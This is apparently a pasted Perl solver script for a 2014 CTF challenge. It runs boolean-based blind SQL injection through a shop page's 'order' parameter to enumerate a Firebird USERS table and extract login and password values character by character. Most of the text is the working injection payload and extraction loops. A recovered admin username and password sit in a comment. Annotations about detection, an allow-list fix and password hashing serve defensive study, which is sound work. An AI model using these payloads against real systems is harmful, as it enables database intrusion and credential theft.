
Untitled

a guest Jan 16th, 2014 159 Never
  # Solver script for a "hackyou 2014" CTF task: boolean-based blind SQL
  # injection through the `order` query parameter of a shop page.  Each probe
  # is a plain GET; the response body is searched for the marker 1337.
  #
  # Defensive reading: the traffic is noisy.  Every stage sends a long run of
  # sequential requests to one endpoint, each carrying "case when",
  # "ascii_char(" and rdb$ system-table names in the query string, so
  # access-log review or a simple request-pattern rule will surface it.
  # The parameter name suggests the value ends up in an ORDER BY clause; a
  # sort key cannot be sent as a bound parameter, so the fix on the server
  # side is to map the requested value onto a fixed allow-list of columns.
  use LWP::Simple;

  # Result recorded by the original author:
  #username:password
  #admin:9shS3FAk

  # extract columns from USERS

  # Base request; the injected expression is appended after `order=`.
  $url = "http://hackyou2014tasks.ctf.su:30080/index.php?page=shop&order=";

  # $fst and $snd bracket the prefix being guessed.  The table name is spelled
  # with character codes (117,115,101,114,115 = "users") and ascii_char(37) is
  # "%", so the condition reads: a field of table "users" whose lower-cased
  # name is LIKE '<prefix>%'.  The THEN branch selects "first 1" row and the
  # ELSE branch "first 2" rows; the script relies on the page differing
  # between the two -- presumably the two-row scalar subquery fails.
  $fst = "case when(1=(select first 1 1 from rdb\$relation_fields where lower(RDB\$RELATION_NAME)=ascii_char(117)||ascii_char(115)||ascii_char(101)||ascii_char(114)||ascii_char(115) and lower(rdb\$field_name) LIKE ";
  $snd = "||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";

  # Miss counter shared by the stages that follow.
  $b = 0;

  # LOGIN column part
  #
  # Grows the guessed column-name prefix held in $fst by one character per
  # outer pass (at most 100 passes).  Candidates are the codes 97..121
  # ('a'..'y').  A candidate counts as a hit when the response contains 1337;
  # 37 ('%') and 95 ('_') are LIKE wildcards and are refused, although
  # neither value lies in this range.
  POSITION:
  for my $pos (0 .. 99) {
      CANDIDATE:
      for my $code (97 .. 121) {
          my $probe = $url . $fst . "ascii_char(" . $code . ")" . $snd;
          my $page  = get($probe);

          # Miss: marker absent, or the candidate is a wildcard character.
          if ($page !~ /1337/ || $code == 37 || $code == 95) {
              $b++;
              next CANDIDATE;
          }

          # Hit: echo the character and extend the prefix with it.
          print chr($code);
          $fst .= "ascii_char(" . $code . ")||";
          last CANDIDATE;
      }

      # Every candidate missed (25 misses): the name is complete.
      last POSITION if $b == 122 - 97;
      $b = 0;
  }
  print "\n";

  # PASSWD column part
  #
  # Same procedure as for the previous column, restarted from an empty
  # prefix.  The only difference is that code 108 ('l') is also refused at
  # every position, which keeps the search away from names containing 'l'
  # -- presumably to skip the column already found.  $snd is reused as set
  # earlier in the script.
  $fst = "case when(1=(select first 1 1 from rdb\$relation_fields where lower(RDB\$RELATION_NAME)=ascii_char(117)||ascii_char(115)||ascii_char(101)||ascii_char(114)||ascii_char(115) and lower(rdb\$field_name) LIKE ";
  $b = 0;

  POSITION:
  for my $pos (0 .. 99) {
      CANDIDATE:
      for my $code (97 .. 121) {
          my $probe = $url . $fst . "ascii_char(" . $code . ")" . $snd;
          my $page  = get($probe);

          # Miss: marker absent, or one of the refused codes (%, _, l).
          if ($page !~ /1337/ || $code == 37 || $code == 95 || $code == 108) {
              $b++;
              next CANDIDATE;
          }

          # Hit: echo the character and extend the prefix with it.
          print chr($code);
          $fst .= "ascii_char(" . $code . ")||";
          last CANDIDATE;
      }

      # Every candidate missed (25 misses): the name is complete.
      last POSITION if $b == 122 - 97;
      $b = 0;
  }
  print "\n";

  #extract data from USERS ( LOGIN,PASSWD)
  #
  # Stage for the LOGIN value: the condition now asks whether a row of USERS
  # has LOGIN LIKE '<prefix>%'.  Candidates are the codes 65..122 and each
  # accepted character is printed on its own line.  $b is not re-initialised
  # here; it enters with whatever value the preceding stage left in it.
  $fst = "case when(1=(select first 1 1 from USERS where LOGIN LIKE ";
  $snd = "||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";

  POSITION:
  for my $pos (0 .. 99) {
      CANDIDATE:
      for my $code (65 .. 122) {
          my $probe = $url . $fst . "ascii_char(" . $code . ")" . $snd;
          my $page  = get($probe);

          # Miss: marker absent, or a LIKE wildcard (95 '_' is in range).
          if ($page !~ /1337/ || $code == 37 || $code == 95) {
              $b++;
              next CANDIDATE;
          }

          # Hit: echo the character and extend the prefix with it.
          print chr($code) . "\n";
          $fst .= "ascii_char(" . $code . ")||";
          last CANDIDATE;
      }

      # Stop once the miss counter equals the size of the candidate range.
      last POSITION if $b == 123 - 65;
      $b = 0;
  }
  print "\n";

  # Stage for the PASSWD value: same loop with the condition
  # PASSWD LIKE '<prefix>%' and candidates 48..122 (digits, letters and the
  # punctuation between them).  $b again carries over from the stage before.
  #
  # NOTE(review): the value recovered this way is whatever the PASSWD column
  # stores.  Independently of fixing the injection, keeping only salted,
  # slow password hashes in that column limits what such a leak exposes.
  $fst = "case when(1=(select first 1 1 from USERS where PASSWD LIKE ";
  $snd = "||ascii_char(37) )) then (select first 1 1 from rdb\$relations) else (select first 2 1 from rdb\$relations) end";

  POSITION:
  for my $pos (0 .. 99) {
      CANDIDATE:
      for my $code (48 .. 122) {
          my $probe = $url . $fst . "ascii_char(" . $code . ")" . $snd;
          my $page  = get($probe);

          # Miss: marker absent, or a LIKE wildcard (95 '_' is in range).
          if ($page !~ /1337/ || $code == 37 || $code == 95) {
              $b++;
              next CANDIDATE;
          }

          # Hit: echo the character and extend the prefix with it.
          print chr($code) . "\n";
          $fst .= "ascii_char(" . $code . ")||";
          last CANDIDATE;
      }

      # Stop once the miss counter equals the size of the candidate range.
      last POSITION if $b == 123 - 48;
      $b = 0;
  }
  print "\n";